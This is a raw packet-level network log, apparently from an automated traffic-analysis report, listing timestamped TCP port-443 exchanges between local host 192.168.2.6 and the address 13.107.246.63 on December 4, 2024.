                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.549510956 CET4434987413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.549603939 CET49874443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.549870014 CET49874443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.549879074 CET4434987413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.394285917 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.399535894 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.399558067 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.400274992 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.400286913 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.622711897 CET4434987113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.673964024 CET49871443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.826431036 CET49871443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.826467991 CET4434987113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.826900959 CET49871443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.826906919 CET4434987113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.837183952 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.840315104 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.840390921 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.840419054 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.840456963 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.844826937 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.844863892 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.844921112 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.844928026 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.977546930 CET49875443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.977596998 CET4434987513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.977659941 CET49875443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.978796005 CET49875443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:17.978807926 CET4434987513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.202567101 CET4434987113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.205396891 CET4434987313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.205739021 CET4434987113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.205795050 CET49871443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.215953112 CET4434987213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.243288040 CET49871443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.243334055 CET4434987113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.243355989 CET49871443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.243361950 CET4434987113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.245254040 CET49873443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.245266914 CET4434987313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.245951891 CET49873443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.245956898 CET4434987313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.247394085 CET49872443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.247452974 CET4434987213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.248048067 CET49872443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.248054028 CET4434987213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.271122932 CET49876443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.271183968 CET4434987613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.271249056 CET49876443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.275048971 CET49876443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.275079966 CET4434987613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.410660028 CET4434987413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.414016962 CET49874443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.414051056 CET4434987413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.415628910 CET49874443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.415636063 CET4434987413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.650418043 CET4434987313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.650507927 CET4434987313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.650614023 CET49873443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.650958061 CET49873443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.650988102 CET4434987313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.651001930 CET49873443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.651007891 CET4434987313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.654350996 CET49877443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.654397964 CET4434987713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.654476881 CET49877443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.654640913 CET49877443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.654649019 CET4434987713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.726353884 CET4434987213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.729520082 CET4434987213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.729626894 CET49872443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.729691029 CET49872443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.729691029 CET49872443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.729720116 CET4434987213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.729734898 CET4434987213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.732903004 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.732940912 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.733179092 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.733376980 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.733381987 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.871433973 CET4434987413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.874913931 CET4434987413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.874990940 CET4434987413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.875142097 CET49874443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.875143051 CET49874443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.875211000 CET49874443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.875232935 CET4434987413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.875246048 CET49874443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.875252008 CET4434987413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.879218102 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.879276991 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.879355907 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.879586935 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:18.879594088 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:19.842289925 CET4434987513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:19.843442917 CET49875443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:19.843460083 CET4434987513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:19.843956947 CET49875443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:19.843961954 CET4434987513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.068958998 CET4434987613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.083364010 CET49876443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.083389044 CET4434987613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.083911896 CET49876443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.083918095 CET4434987613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.303446054 CET4434987513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.307919025 CET4434987513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.308001041 CET49875443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.361939907 CET49875443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.361985922 CET4434987513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.362000942 CET49875443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.362009048 CET4434987513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.367655993 CET49880443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.367723942 CET4434988013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.367790937 CET49880443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.373297930 CET49880443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.373316050 CET4434988013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.508754015 CET4434987713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.519751072 CET4434987613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.523823977 CET4434987613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.523875952 CET4434987613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.523910999 CET49876443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.523963928 CET49876443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.526068926 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.549050093 CET49877443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.706510067 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.712430954 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.767687082 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.792840958 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.792853117 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.793330908 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.793335915 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.800776005 CET49877443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.800795078 CET4434987713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.805049896 CET49877443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.805058002 CET4434987713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.809007883 CET49876443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.809041977 CET4434987613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.809056997 CET49876443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.809062958 CET4434987613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.831809044 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.831845999 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.832341909 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:20.832349062 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.054480076 CET49881443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.054538012 CET4434988113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.054616928 CET49881443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.126250029 CET49881443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.126277924 CET4434988113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.337203026 CET4434987713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.337294102 CET4434987713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.337341070 CET49877443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.337529898 CET49877443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.337553024 CET4434987713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.337563038 CET49877443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.337568045 CET4434987713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.342406988 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.342464924 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.342526913 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.342767954 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.342772961 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.362549067 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.363372087 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.363464117 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.363506079 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.365745068 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.365793943 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.365804911 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.365848064 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.390657902 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.390695095 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.390708923 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.390722990 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.393898964 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.393918991 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.393937111 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.393940926 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.399820089 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.399861097 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.399924994 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.401209116 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.401263952 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.401312113 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.401757956 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.401771069 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.401981115 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:21.401998997 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.173486948 CET4434988013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.174324989 CET49880443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.174355030 CET4434988013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.174894094 CET49880443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.174902916 CET4434988013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.624603033 CET4434988013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.628690004 CET4434988013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.628797054 CET49880443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.628828049 CET49880443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.628846884 CET4434988013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.628859043 CET49880443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.628864050 CET4434988013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.631972075 CET49885443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.632010937 CET4434988513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.632102966 CET49885443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.632240057 CET49885443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.632252932 CET4434988513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.995707989 CET4434988113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.996973038 CET49881443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.996999025 CET4434988113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.997473955 CET49881443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:22.997478962 CET4434988113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.272389889 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.276981115 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.277184963 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.297631025 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.297662020 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.299554110 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.299566031 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.303630114 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.303663969 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.304239988 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.304250002 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.304670095 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.304699898 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.305128098 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.305133104 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.446645021 CET4434988113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.450562954 CET4434988113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.450795889 CET49881443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.596869946 CET49881443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.596903086 CET4434988113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.596915960 CET49881443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.596923113 CET4434988113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.735467911 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.737045050 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.737639904 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.738893986 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.738981962 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.741004944 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.741065025 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.741173029 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.741218090 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.741221905 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.741260052 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.871380091 CET49886443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.871423960 CET4434988613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.871521950 CET49886443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.872060061 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.872081041 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.872097015 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.872102022 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.873059034 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.873075008 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.873934984 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.873970985 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.909110069 CET49886443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:23.909145117 CET4434988613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.045331001 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.045387983 CET4434988713.107.246.63192.168.2.6
